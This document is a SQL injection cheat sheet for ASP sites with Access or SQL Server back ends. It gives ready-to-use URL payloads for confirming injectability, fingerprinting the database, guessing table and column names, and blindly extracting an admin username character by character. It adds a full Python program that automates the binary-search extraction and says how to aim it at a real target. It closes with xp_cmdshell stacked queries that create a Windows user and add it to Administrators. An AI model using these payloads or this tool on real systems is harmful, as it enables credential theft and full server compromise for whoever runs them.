Determining whether the parameter is injectable
① http://localhost/showdetail.asp?id=49
② http://localhost/showdetail.asp?id=49 and 1=1
③ http://localhost/showdetail.asp?id=49 and 1=2
If ① and ② return the same page while ③ returns a different page or an error, the id value is being concatenated into the SQL statement unfiltered and can be injected. A further probe:
http://localhost/showdetail.asp?id=49 and user>0
On SQL Server, user is the current database user name (a character value); comparing it with the integer 0 forces a type conversion that fails, and the resulting error message discloses the user name (for example dbo). Access has no user function, so the request simply errors.
Determining whether the back end is Access or SQL Server
http://localhost/showdetail.asp?id=49 and (select count(*) from sysobjects)>0      SQL Server
http://localhost/showdetail.asp?id=49 and (select count(*) from msysobjects)>0     Access
The system table sysobjects exists only on SQL Server and MSysObjects only on Access, so exactly one of the two requests should display normally. Caveat: the default Access user often has no read permission on MSysObjects, so the second request may error on Access as well; in that case the wording of the two error messages still tells the products apart.
Guessing table names
http://localhost/showdetail.asp?id=49 and (Select Count(*) from [table name])>=0      If the page displays normally, a table with that name exists; if it errors or shows no record, it does not.
Guessing column names
http://localhost/showdetail.asp?id=49 and (Select Count([column name]) from [table name])>=0      If the page displays normally, the column exists in that table. This only works after the table name has been guessed correctly, since an unknown table makes the whole subquery fail regardless of the column.
Guessing the length of a value
http://localhost/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>N      Guess the length of the username in the first row of the Admin table: the page displays normally while the length is greater than N, so the true length is the smallest N for which it stops displaying.
Guessing a value character by character through its ASCII code
http://localhost/showdetail.asp?id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>N
mid(username,1,1) takes the first character and asc() returns its code; step the second argument of mid to move through the string (on SQL Server use substring() and ascii() instead). Since letters and digits all have codes below 128 (printable ASCII is 32-126), a binary search over N finds each character in at most 7 requests instead of up to 128, and writing the procedure as a program instead of typing URLs by hand speeds it up enormously.
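The whole procedure above (injectability test, table and column guessing, length and per-character extraction with binary search) as one program. This is an added example, not code from the original cheat sheet. The target is a constructed in-memory SQLite database standing in for the ASP page's Access/SQL Server back end, so the table, column and row contents (product, Admin, username, "admin") are assumptions; the "access" payload templates reproduce the page's top/len/asc/mid syntax, while the "sqlite" templates are the equivalent for the simulated back end so the code runs offline.

```python
import sqlite3

# Constructed sample data (assumption): a product table the page displays from,
# and the Admin table whose username column is the extraction target.
def build_target():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table product (id integer, title text)")
    conn.execute("insert into product values (49, 'Widget')")
    conn.execute("create table Admin (id integer, username text, password text)")
    conn.execute("insert into Admin values (1, 'admin', 'secret')")
    return conn


class VulnerablePage:
    """Stand-in for showdetail.asp: the id parameter is concatenated into the SQL."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0  # how many "HTTP requests" the attack needed

    def get(self, id_param):
        """True when the page 'displays normally' (a row came back); False on no row or a SQL error."""
        self.requests += 1
        sql = "select title from product where id=" + id_param
        try:
            return self.conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False


# Payload templates. "access" is the page's syntax (on SQL Server replace asc/mid
# with ascii/substring); "sqlite" is the equivalent for the simulated target.
PAYLOADS = {
    "access": {
        "length": "{id} and (select top 1 len({col}) from {tbl})>{n}",
        "char": "{id} and (select top 1 asc(mid({col},{pos},1)) from {tbl})>{n}",
    },
    "sqlite": {
        "length": "{id} and (select length({col}) from {tbl} limit 1)>{n}",
        "char": "{id} and (select unicode(substr({col},{pos},1)) from {tbl} limit 1)>{n}",
    },
}


def is_injectable(page, id="49"):
    """The page's 1=1 / 1=2 test: a true condition keeps the row, a false one drops it."""
    return page.get(id) and page.get(f"{id} and 1=1") and not page.get(f"{id} and 1=2")


def table_exists(page, tbl, id="49"):
    # [brackets] are the Access/SQL Server identifier quoting from the page; SQLite accepts them too.
    return page.get(f"{id} and (select count(*) from [{tbl}])>=0")


def column_exists(page, tbl, col, id="49"):
    return page.get(f"{id} and (select count([{col}]) from [{tbl}])>=0")


def probe_number(oracle, lo, hi):
    """Binary search for v when oracle(n) answers 'v > n'; assumes lo <= v <= hi."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_value(page, tbl, col, dialect="sqlite", id="49", max_len=64):
    """Recover the first row's value of tbl.col: length first, then one character at a time."""
    t = PAYLOADS[dialect]
    length = probe_number(
        lambda n: page.get(t["length"].format(id=id, col=col, tbl=tbl, n=n)), 0, max_len)
    out = []
    for pos in range(1, length + 1):
        # Codes below 128 only, so at most 7 requests per character.
        code = probe_number(
            lambda n: page.get(t["char"].format(id=id, col=col, tbl=tbl, pos=pos, n=n)), 0, 127)
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    page = VulnerablePage(build_target())
    print("injectable:", is_injectable(page))
    print("table Admin:", table_exists(page, "Admin"), " table Users:", table_exists(page, "Users"))
    print("column Admin.username:", column_exists(page, "Admin", "username"))
    print("username =", extract_value(page, "Admin", "username"), "after", page.requests, "requests")
```

Against a real target, replace VulnerablePage.get with an HTTP fetch that returns True when the response contains the text of the normal page, and pass dialect="access" (or a SQL Server template) to extract_value. A nonexistent table or column makes the subquery fail, which the oracle reports as "not displayed", exactly the signal the guessing steps above rely on.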
Executing operating-system commands: create a user (SQL Server only)
http://Site/url.asp?id=1;exec master..xp_cmdshell 'net user name password /add'--
Add that user to the local Administrators group
http://Site/url.asp?id=1;exec master..xp_cmdshell 'net localgroup name administrators /add'--
The semicolon ends the page's own statement, the extended procedure runs the command as the SQL Server service account, and -- comments out whatever the page appends after the parameter. name and password are placeholders. This only works against SQL Server (Access has no xp_cmdshell and does not execute stacked statements), only when the application's database login is sysadmin or has been explicitly granted xp_cmdshell, and only when xp_cmdshell is enabled: from SQL Server 2005 onward it is disabled by default and has to be switched on through sp_configure. Quote the command with single quotes; a double-quoted string is only accepted when QUOTED_IDENTIFIER is OFF.